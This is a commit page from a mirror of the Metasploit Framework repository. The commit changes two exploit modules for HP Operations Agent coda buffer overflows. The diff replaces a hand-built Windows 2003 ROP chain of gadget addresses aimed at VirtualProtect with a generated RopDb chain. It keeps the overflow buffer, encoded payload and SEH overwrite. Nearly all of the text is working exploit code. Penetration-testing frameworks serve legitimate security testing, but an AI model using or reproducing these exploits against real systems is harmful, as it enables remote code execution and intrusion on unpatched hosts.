infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'operations_agent_fixes' of git://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-operations_agent_fixes

unstable
sinn3r 2012-10-29 10:02:47 -05:00
parent 2664fc83fa 0e3bc7d060
commit a8d494ce1c
2 changed files with 10 additions and 62 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
View File

@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
include Msf::Exploit::RopDb
def initialize
super(
@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14
bof << payload.encoded
bof << rand_text(4000) # Allows to trigger exception
else # Windows 2003
rop_gadgets =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
bof = Rex::Text.pattern_create(target['RopOffset'])
bof << rop_gadgets
bof << payload.encoded
my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length
rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'})
bof = rand_text(target['RopOffset'])
bof << rop_payload
my_payload_length = target['RopOffset'] + rop_payload.length
bof << rand_text(target['Offset'] - my_payload_length)
bof << generate_seh_record(target.ret)
bof << rand_text(4000) # Allows to trigger exception

36
modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
View File

@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
include Msf::Exploit::RopDb
def initialize
super(
@ -182,37 +183,10 @@ user-agent: BBC 11.00.044; 14
bof << payload.encoded
bof << rand_text(4000) # Allows to trigger exception
else # Windows 2003
rop_gadgets =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
bof = Rex::Text.pattern_create(target['RopOffset'])
bof << rop_gadgets
bof << payload.encoded
my_payload_length = target['RopOffset'] + rop_gadgets.length + payload.encoded.length
rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'2003'})
bof = rand_text(target['RopOffset'])
bof << rop_payload
my_payload_length = target['RopOffset'] + rop_payload.length
bof << rand_text(target['Offset'] - my_payload_length)
bof << generate_seh_record(target.ret)
bof << rand_text(4000) # Allows to trigger exception